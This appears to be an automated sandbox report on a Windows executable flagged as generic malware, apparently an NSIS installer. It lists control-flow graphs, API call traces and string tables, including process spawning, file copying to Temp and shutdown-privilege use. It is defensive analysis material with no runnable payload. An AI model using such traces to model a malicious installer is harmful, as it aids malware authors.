6eac12ef GetVersion 3715->3716 3717 6eac12c4 3715->3717 3718 6eac1364 3716->3718 3719 6eac1390 3716->3719 3720 6eac1ac2 2 API calls 3717->3720 3721 6eac136e 3718->3721 3722 6eac1373 GlobalAlloc 3718->3722 3723 6eac139d InitializeSecurityDescriptor SetSecurityDescriptorDacl 3719->3723 3724 6eac13c4 CreatePipe 3719->3724 3725 6eac12ce 3720->3725 3721->3722 3726 6eac138e 3722->3726 3727 6eac144a lstrcpyA 3722->3727 3723->3724 3724->3727 3728 6eac13dd CreatePipe 3724->3728 3730 6eac12de DeleteFileA 3725->3730 3731 6eac12e7 3725->3731 3726->3719 3729 6eac145c 3727->3729 3728->3727 3732 6eac13f0 GetStartupInfoA CreateProcessA 3728->3732 3733 6eac146a 3729->3733 3734 6eac1464 3729->3734 3730->3731 3731->3716 3732->3727 3735 6eac151c GetTickCount 3732->3735 3737 6eac147e 3733->3737 3739 6eac1473 3733->3739 3736 6eac1ac2 2 API calls 3734->3736 3738 6eac152a WaitForSingleObject GetExitCodeProcess 3735->3738 3736->3733 3741 6eac1499 3737->3741 3742 6eac1487 lstrcpyA 3737->3742 3740 6eac1544 PeekNamedPipe 3738->3740 3782 6eac183d 3739->3782 3744 6eac172e 3740->3744 3745 6eac155e GetTickCount ReadFile 3740->3745 3746 6eac14b9 3741->3746 3747 6eac14a1 wsprintfA 3741->3747 3742->3741 3744->3729 3750 6eac173e GetTickCount 3744->3750 3751 6eac176f Sleep 3744->3751 3760 6eac159a 3745->3760 3749 6eac1ac2 2 API calls 3746->3749 3747->3746 3752 6eac14c5 6 API calls 3749->3752 3750->3751 3753 6eac174d TerminateProcess lstrcpyA 3750->3753 3751->3738 3754 6eac14f4 3752->3754 3753->3738 3755 6eac14fc DeleteFileA 3754->3755 3756 6eac1505 GlobalFree 3754->3756 3755->3756 3756->3711 3757 6eac1514 GlobalFree 3756->3757 3757->3711 3758 6eac1652 lstrcpyA 3758->3760 3759 6eac16be GlobalReAlloc 3759->3760 3761 6eac1710 lstrcpyA 3759->3761 3760->3738 3760->3740 3760->3758 3760->3759 3763 6eac183d 5 API calls 3760->3763 3787 6eac1784 3760->3787 3761->3738 3763->3760 3765 6eac17ff 3764->3765 3766 6eac1819 GetProcAddress 3764->3766 3765->3766 3767 6eac10dc 3765->3767 3766->3767 3768 6eac1828 
3766->3768 3767->3694 3767->3695 3768->3767 3770 6eac1a8c 3769->3770 3771 6eac1abb 3769->3771 3770->3771 3772 6eac1aac GlobalFree 3770->3772 3773 6eac1a99 lstrcpyA 3770->3773 3771->3712 3772->3771 3773->3772 3775 6eac18fa lstrlenA 3774->3775 3776 6eac18d3 lstrcmpiA 3775->3776 3778 6eac1902 3775->3778 3777 6eac18f1 CharNextA 3776->3777 3776->3778 3777->3775 3778->3712 3780 6eac1acb GlobalAlloc lstrcpynA 3779->3780 3781 6eac115a GlobalFree 3779->3781 3780->3781 3781->3711 3783 6eac184e 3782->3783 3784 6eac147c 3782->3784 3785 6eac1869 SendMessageA SendMessageA SendMessageA 3783->3785 3786 6eac1859 lstrlenA OemToCharBuffA 3783->3786 3784->3737 3785->3784 3786->3785 3788 6eac178f CharNextExA 3787->3788 3789 6eac17bd 3787->3789 3788->3789 3789->3760 3790 4054b6 3791 405661 3790->3791 3792 4054d8 GetDlgItem GetDlgItem GetDlgItem 3790->3792 3794 405691 3791->3794 3795 405669 GetDlgItem CreateThread FindCloseChangeNotification 3791->3795 3836 404309 SendMessageA 3792->3836 3796 4056bf 3794->3796 3798 4056e0 3794->3798 3799 4056a7 ShowWindow ShowWindow 3794->3799 3795->3794 3859 40544a 5 API calls 3795->3859 3800 4056c7 3796->3800 3801 40571a 3796->3801 3797 405548 3803 40554f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3797->3803 3845 40433b 3798->3845 3841 404309 SendMessageA 3799->3841 3805 4056f3 ShowWindow 3800->3805 3806 4056cf 3800->3806 3801->3798 3812 405727 SendMessageA 3801->3812 3810 4055a1 SendMessageA SendMessageA 3803->3810 3811 4055bd 3803->3811 3808 405713 3805->3808 3809 405705 3805->3809 3842 4042ad 3806->3842 3807 4056ec 3815 4042ad SendMessageA 3808->3815 3814 405378 24 API calls 3809->3814 3810->3811 3816 4055d0 3811->3816 3817 4055c2 SendMessageA 3811->3817 3812->3807 3818 405740 CreatePopupMenu 3812->3818 3814->3808 3815->3801 3837 4042d4 3816->3837 3817->3816 3819 4062ea 17 API calls 3818->3819 3821 405750 AppendMenuA 3819->3821 3823 405781 TrackPopupMenu 3821->3823 3824 40576e GetWindowRect 3821->3824 3822 4055e0 3825 4055e9 ShowWindow 
3822->3825 3826 40561d GetDlgItem SendMessageA 3822->3826 3823->3807 3827 40579d 3823->3827 3824->3823 3828 40560c 3825->3828 3829 4055ff ShowWindow 3825->3829 3826->3807 3830 405644 SendMessageA SendMessageA 3826->3830 3831 4057bc SendMessageA 3827->3831 3840 404309 SendMessageA 3828->3840 3829->3828 3830->3807 3831->3831 3832 4057d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3831->3832 3834 4057fb SendMessageA 3832->3834 3834->3834 3835 40581d GlobalUnlock SetClipboardData CloseClipboard 3834->3835 3835->3807 3836->3797 3838 4062ea 17 API calls 3837->3838 3839 4042df SetDlgItemTextA 3838->3839 3839->3822 3840->3826 3841->3796 3843 4042b4 3842->3843 3844 4042ba SendMessageA 3842->3844 3843->3844 3844->3798 3846 4043fe 3845->3846 3847 404353 GetWindowLongA 3845->3847 3846->3807 3847->3846 3848 404368 3847->3848 3848->3846 3849 404395 GetSysColor 3848->3849 3850 404398 3848->3850 3849->3850 3851 4043a8 SetBkMode 3850->3851 3852 40439e SetTextColor 3850->3852 3853 4043c0 GetSysColor 3851->3853 3854 4043c6 3851->3854 3852->3851 3853->3854 3855 4043d7 3854->3855 3856 4043cd SetBkColor 3854->3856 3855->3846 3857 4043f1 CreateBrushIndirect 3855->3857 3858 4043ea DeleteObject 3855->3858 3856->3855 3857->3846 3858->3857 4607 404ab7 4608 404ae3 4607->4608 4609 404ac7 4607->4609 4611 404b16 4608->4611 4612 404ae9 SHGetPathFromIDListA 4608->4612 4618 405951 GetDlgItemTextA 4609->4618 4614 404b00 SendMessageA 4612->4614 4615 404af9 4612->4615 4613 404ad4 SendMessageA 4613->4608 4614->4611 4616 40140b 2 API calls 4615->4616 4616->4614 4618->4613 4619 4014b7 4620 4014bd 4619->4620 4621 401389 2 API calls 4620->4621 4622 4014c5 4621->4622 3977 4015bb 3978 402c39 17 API calls 3977->3978 3979 4015c2 3978->3979 3980 405c82 4 API calls 3979->3980 3985 4015ca 3980->3985 3981 401624 3983 401652 3981->3983 3984 401629 3981->3984 3982 405c14 CharNextA 3982->3985 3988 401423 24 API calls 3983->3988 3986 401423 24 API calls 3984->3986 3985->3981 3985->3982 3990 4058bb 2 API calls 
3985->3990 3991 4058d8 5 API calls 3985->3991 3994 40160c GetFileAttributesA 3985->3994 3995 40583e 4 API calls 3985->3995 3987 401630 3986->3987 3996 406257 lstrcpynA 3987->3996 3993 40164a 3988->3993 3990->3985 3991->3985 3992 40163b SetCurrentDirectoryA 3992->3993 3994->3985 3995->3985 3996->3992 4623 4016bb 4624 402c39 17 API calls 4623->4624 4625 4016c1 GetFullPathNameA 4624->4625 4626 4016d8 4625->4626 4627 4016f9 4625->4627 4626->4627 4630 4065ce 2 API calls 4626->4630 4628 402ac5 4627->4628 4629 40170d GetShortPathNameA 4627->4629 4629->4628 4631 4016e9 4630->4631 4631->4627 4633 406257 lstrcpynA 4631->4633 4633->4627 4634 402abe InvalidateRect 4635 402ac5 4634->4635 4636 40443f 4637 404455 4636->4637 4645 404561 4636->4645 4639 4042d4 18 API calls 4637->4639 4638 4045d0 4640 40469a 4638->4640 4641 4045da GetDlgItem 4638->4641 4642 4044ab 4639->4642 4647 40433b 8 API calls 4640->4647 4643 4045f0 4641->4643 4644 404658 4641->4644 4646 4042d4 18 API calls 4642->4646 4643->4644 4650 404616 SendMessageA LoadCursorA SetCursor 4643->4650 4644->4640 4651 40466a 4644->4651 4645->4638 4645->4640 4648 4045a5 GetDlgItem SendMessageA 4645->4648 4649 4044b8 CheckDlgButton 4646->4649 4661 404695 4647->4661 4669 4042f6 KiUserCallbackDispatcher 4648->4669 4667 4042f6 KiUserCallbackDispatcher 4649->4667 4670 4046e3 4650->4670 4656 404670 SendMessageA 4651->4656 4657 404681 4651->4657 4653 4045cb 4658 4046bf SendMessageA 4653->4658 4656->4657 4657->4661 4662 404687 SendMessageA 4657->4662 4658->4638 4659 4044d6 GetDlgItem 4668 404309 SendMessageA 4659->4668 4662->4661 4664 4044ec SendMessageA 4665 404513 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4664->4665 4666 40450a GetSysColor 4664->4666 4665->4661 4666->4665 4667->4659 4668->4664 4669->4653 4673 405933 ShellExecuteExA 4670->4673 4672 404649 LoadCursorA SetCursor 4672->4644 4673->4672

Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 6EAC17C3: GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,6EAC10DC), ref: 6EAC17CC
                                                                          • Part of subcall function 6EAC17C3: GetModuleHandleA.KERNEL32(KERNEL32,?,?,00000000,?,?,?,6EAC10DC), ref: 6EAC17DA
                                                                          • Part of subcall function 6EAC17C3: GetProcAddress.KERNEL32(00000000,?), ref: 6EAC17F9
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104), ref: 6EAC10F6
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6EAC110C
                                                                        • CharPrevA.USER32(?,?), ref: 6EAC1134
                                                                        • GlobalFree.KERNEL32(00000000), ref: 6EAC115B
                                                                        • GetTempFileNameA.KERNEL32(?,6EAC3050,00000000,?), ref: 6EAC1178
                                                                        • CopyFileA.KERNEL32(?,?,00000000), ref: 6EAC118C
                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 6EAC11A4
                                                                        • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 6EAC11B3
                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 6EAC11C1
                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 6EAC11EB
                                                                        • CloseHandle.KERNEL32(00000000), ref: 6EAC11F2
                                                                        • CloseHandle.KERNEL32(00000000), ref: 6EAC11F9
                                                                        • lstrcatA.KERNEL32(?,6EAC304C), ref: 6EAC1207
                                                                        • lstrlenA.KERNEL32(?), ref: 6EAC1210
                                                                        • GlobalAlloc.KERNEL32(00000040,00000401), ref: 6EAC122D
                                                                        • FindWindowExA.USER32(0001046E,00000000,#32770,00000000), ref: 6EAC1265
                                                                        • FindWindowExA.USER32(00000000), ref: 6EAC1268
                                                                        • lstrcmpiA.KERNEL32(00000000,/OEM), ref: 6EAC12A1
                                                                        • lstrcmpiA.KERNEL32(00000000,/MBCS), ref: 6EAC12B6
                                                                        • DeleteFileA.KERNEL32(?,error), ref: 6EAC12E1
                                                                        • GetVersion.KERNEL32 ref: 6EAC1327
                                                                        • GlobalAlloc.KERNEL32(00000040,00000401), ref: 6EAC137A
                                                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 6EAC13A5
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 6EAC13B5
                                                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6EAC13D7
                                                                        • CreatePipe.KERNELBASE(?,?,0000000C,00000000), ref: 6EAC13EA
                                                                        • GetStartupInfoA.KERNEL32(00000044), ref: 6EAC13F7
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,?), ref: 6EAC143C
                                                                        • lstrcpyA.KERNEL32(?,error), ref: 6EAC1456
                                                                        • lstrcpyA.KERNEL32(?,error), ref: 6EAC1493
                                                                        • wsprintfA.USER32 ref: 6EAC14B0
                                                                        • CloseHandle.KERNEL32(?,?), ref: 6EAC14CE
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC14D3
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC14D8
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC14DD
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC14E2
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC14E7
                                                                        • DeleteFileA.KERNEL32(?), ref: 6EAC14FF
                                                                        • GlobalFree.KERNEL32(?), ref: 6EAC150E
                                                                        • GlobalFree.KERNEL32(00000002), ref: 6EAC1515
                                                                        • GetTickCount.KERNEL32 ref: 6EAC151C
                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 6EAC152E
                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 6EAC153E
                                                                        • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 6EAC154F
                                                                        • GetTickCount.KERNEL32 ref: 6EAC155E
                                                                        • ReadFile.KERNEL32(?,?,00000400,?,00000000), ref: 6EAC157E
                                                                        • lstrcpyA.KERNEL32(?, ), ref: 6EAC165A
                                                                        • GlobalReAlloc.KERNEL32(00000002,?,00000042), ref: 6EAC16CB
                                                                        • lstrcpyA.KERNEL32(?,error), ref: 6EAC171C
                                                                        • GetTickCount.KERNEL32 ref: 6EAC173E
                                                                        • TerminateProcess.KERNEL32(?,000000FF), ref: 6EAC1752
                                                                        • lstrcpyA.KERNEL32(?,timeout), ref: 6EAC1764
                                                                        • Sleep.KERNELBASE(00000064), ref: 6EAC1771
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$Handle$Close$Global$Createlstrcpy$AllocProcess$CountFreePipeTick$DeleteDescriptorFindModuleNameSecurityViewWindowlstrcmpi$AddressCharCodeCopyCurrentDaclExitInfoInitializeMappingNamedObjectPeekPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcatlstrlenwsprintf
                                                                        • String ID: $#32770$/MBCS$/OEM$/TIMEOUT=$D$SysListView32$error$timeout
                                                                        • API String ID: 2662719652-2772347907
                                                                        • Opcode ID: 8630946eadece29039f570012307b1d60038c26d92e6560c7916c8f02caa9856
                                                                        • Instruction ID: 6e4aaeaf3364986e650eaa38d23760f4b359dfea829f91911731852bbfaa3a0c
                                                                        • Opcode Fuzzy Hash: 8630946eadece29039f570012307b1d60038c26d92e6560c7916c8f02caa9856
                                                                        • Instruction Fuzzy Hash: A7227C71E00649EFDF108FE4C888AEEBBB9BB15B05F1540AAE555B7200D7344D89CF6A
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%
                                                                        Control-flow Graph
                                                                        control_flow_graph 127 4033b3-403403 SetErrorMode GetVersionExA 128 403444 127->128 129 403405-40341f GetVersionExA 127->129 131 40344b 128->131 130 403421-403440 129->130 129->131 130->128 132 40344d-403458 131->132 133 40346f-403476 131->133 134 40345a-403469 132->134 135 40346b 132->135 136 403480-4034c0 133->136 137 403478 133->137 134->133 135->133 138 4034c2-4034ca call 406663 136->138 139 4034d3 136->139 137->136 138->139 145 4034cc 138->145 140 4034d8-4034ec call 4065f5 lstrlenA 139->140 146 4034ee-40350a call 406663 * 3 140->146 145->139 153 40351b-40357b #17 OleInitialize SHGetFileInfoA call 406257 GetCommandLineA call 406257 146->153 154 40350c-403512 146->154 161 403586-403599 call 405c14 CharNextA 153->161 162 40357d-403581 153->162 154->153 159 403514 154->159 159->153 165 40365a-40365e 161->165 166 403664 165->166 167 40359e-4035a1 165->167 170 403678-403692 GetTempPathA call 403382 166->170 168 4035a3-4035a7 167->168 169 4035a9-4035b0 167->169 168->168 168->169 171 4035b2-4035b3 169->171 172 4035b7-4035ba 169->172 177 403694-4036b2 GetWindowsDirectoryA lstrcatA call 403382 170->177 178 4036ea-403702 DeleteFileA call 402f0c 170->178 171->172 174 4035c0-4035c4 172->174 175 40364b-403657 call 405c14 172->175 180 4035c6-4035cc 174->180 181 4035dc-403609 174->181 175->165 194 403659 175->194 177->178 195 4036b4-4036e4 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403382 177->195 196 403795-4037a6 call 403963 OleUninitialize 178->196 197 403708-40370e 178->197 187 4035d2 180->187 188 4035ce-4035d0 180->188 183 40361b-403649 181->183 184 40360b-403611 181->184 183->175 192 403666-403673 call 406257 183->192 190 403613-403615 184->190 191 403617 184->191 187->181 188->181 188->187 190->183 190->191 191->183 192->170 194->165 195->178 195->196 209 4037ac-4037bb call 40596d ExitProcess 196->209 210 4038cf-4038d5 196->210 200 403710-40371b call 405c14 197->200 201 403786-40378d call 403a3d 197->201 214 403751-40375a 200->214 215 40371d-403746 200->215 207 403792 201->207 207->196 212 4038d7-4038ec GetCurrentProcess OpenProcessToken 210->212 213 40394d-403955 210->213 221 40391d-40392b call 406663 212->221 222 4038ee-403917 LookupPrivilegeValueA AdjustTokenPrivileges 212->222 216 403957 213->216 217 40395a-40395d ExitProcess 213->217 219 4037c1-4037d5 call 4058d8 lstrcatA 214->219 220 40375c-40376a call 405cd7 214->220 223 403748-40374a 215->223 216->217 232 4037e2-4037fc lstrcatA lstrcmpiA 219->232 233 4037d7-4037dd lstrcatA 219->233 220->196 231 40376c-403782 call 406257 * 2 220->231 234 403939-403944 ExitWindowsEx 221->234 235 40392d-403937 221->235 222->221 223->214 227 40374c-40374f 223->227 227->214 227->223 231->201 232->196 237 4037fe-403801 232->237 233->232 234->213 238 403946-403948 call 40140b 234->238 235->234 235->238 240 403803-403808 call 40583e 237->240 241 40380a call 4058bb 237->241 238->213 249 40380f-40381d SetCurrentDirectoryA 240->249 241->249 250 40382a-403855 call 406257 249->250 251 40381f-403825 call 406257 249->251 255 40385b-403878 call 4062ea DeleteFileA 250->255 251->250 258 4038b8-4038c1 255->258 259 40387a-40388a CopyFileA 255->259 258->255 260 4038c3-4038ca call 406030 258->260 259->258 261 40388c-4038ac call 406030 call 4062ea call 4058f0 259->261 260->196 261->258 270 4038ae-4038b5 CloseHandle 261->270 270->258
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004033D6
                                                                        • GetVersionExA.KERNEL32(?), ref: 004033FF
                                                                        • GetVersionExA.KERNEL32(0000009C), ref: 00403416
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034DF
                                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040351C
                                                                        • OleInitialize.OLE32(00000000), ref: 00403523
                                                                        • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403541
                                                                        • GetCommandLineA.KERNEL32(Drivelingly Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403556
                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000000,?,00000007,00000009,0000000B), ref: 00403590
                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403689
                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040369A
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036A6
                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036BA
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036C2
                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036D3
                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036DB
                                                                        • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036EF
                                                                        • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 0040379A
                                                                        • ExitProcess.KERNEL32 ref: 004037BB
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000000,?,?,00000007,00000009,0000000B), ref: 004037CE
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A14C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000000,?,?,00000007,00000009,0000000B), ref: 004037DD
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",00000000,?,?,00000007,00000009,0000000B), ref: 004037E8
                                                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004037F4
                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403810
                                                                        • DeleteFileA.KERNEL32(00429450,00429450,?,00430000,?,?,00000007,00000009,0000000B), ref: 0040386D
                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,00429450,00000001), ref: 00403882
                                                                        • CloseHandle.KERNEL32(00000000,00429450,00429450,?,00429450,00000000,?,00000007,00000009,0000000B), ref: 004038AF
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038DD
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004038E4
                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403917
                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 0040393C
                                                                        • ExitProcess.KERNEL32 ref: 0040395D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                        • String ID: "$"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"$.tmp$1033$A$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Moviedom230$C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe$Drivelingly Setup$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KNw$~nsu
                                                                        • API String ID: 1000954069-232290593
                                                                        • Opcode ID: c19b75f2fa2de3e90f0fa3d4e92a1fee2e3f99131a1c1424620edc7f8390837b
                                                                        • Instruction ID: 223053d6f2ec0cc509bcc84454fcb5a587f3d9304b07d6be13cf3966b97333d0
                                                                        • Opcode Fuzzy Hash: c19b75f2fa2de3e90f0fa3d4e92a1fee2e3f99131a1c1424620edc7f8390837b
                                                                        • Instruction Fuzzy Hash: DCE1F470904354AADB21AF759D49B6F7EB8AF4570AF0440BFE441B62D2CB7C4A05CB2E
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%
                                                                        Control-flow Graph
                                                                        control_flow_graph 271 4054b6-4054d2 272 405661-405667 271->272 273 4054d8-40559f GetDlgItem * 3 call 404309 call 404bfa GetClientRect GetSystemMetrics SendMessageA * 2 271->273 275 405691-40569d 272->275 276 405669-40568b GetDlgItem CreateThread FindCloseChangeNotification 272->276 294 4055a1-4055bb SendMessageA * 2 273->294 295 4055bd-4055c0 273->295 278 4056bf-4056c5 275->278 279 40569f-4056a5 275->279 276->275 283 4056c7-4056cd 278->283 284 40571a-40571d 278->284 281 4056e0-4056e7 call 40433b 279->281 282 4056a7-4056ba ShowWindow * 2 call 404309 279->282 291 4056ec-4056f0 281->291 282->278 289 4056f3-405703 ShowWindow 283->289 290 4056cf-4056db call 4042ad 283->290 284->281 287 40571f-405725 284->287 287->281 296 405727-40573a SendMessageA 287->296 292 405713-405715 call 4042ad 289->292 293 405705-40570e call 405378 289->293 290->281 292->284 293->292 294->295 300 4055d0-4055e7 call 4042d4 295->300 301 4055c2-4055ce SendMessageA 295->301 302 405740-40576c CreatePopupMenu call 4062ea AppendMenuA 296->302 303 405837-405839 296->303 310 4055e9-4055fd ShowWindow 300->310 311 40561d-40563e GetDlgItem SendMessageA 300->311 301->300 308 405781-405797 TrackPopupMenu 302->308 309 40576e-40577e GetWindowRect 302->309 303->291 308->303 312 40579d-4057b7 308->312 309->308 313 40560c 310->313 314 4055ff-40560a ShowWindow 310->314 311->303 315 405644-40565c SendMessageA * 2 311->315 316 4057bc-4057d7 SendMessageA 312->316 317 405612-405618 call 404309 313->317 314->317 315->303 316->316 318 4057d9-4057f9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 316->318 317->311 320 4057fb-40581b SendMessageA 318->320 320->320 321 40581d-405831 GlobalUnlock SetClipboardData CloseClipboard 320->321 321->303
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405515
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405524
                                                                        • GetClientRect.USER32(?,?), ref: 00405561
                                                                        • GetSystemMetrics.USER32(00000002), ref: 00405568
                                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405589
                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040559A
                                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055AD
                                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055BB
                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CE
                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055F0
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405604
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405625
                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405635
                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564E
                                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040565A
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405533
                                                                          • Part of subcall function 00404309: SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405676
                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000544A,00000000), ref: 00405684
                                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040568B
                                                                        • ShowWindow.USER32(00000000), ref: 004056AE
                                                                        • ShowWindow.USER32(?,00000008), ref: 004056B5
                                                                        • ShowWindow.USER32(00000008), ref: 004056FB
                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572F
                                                                        • CreatePopupMenu.USER32 ref: 00405740
                                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405755
                                                                        • GetWindowRect.USER32(?,000000FF), ref: 00405775
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578E
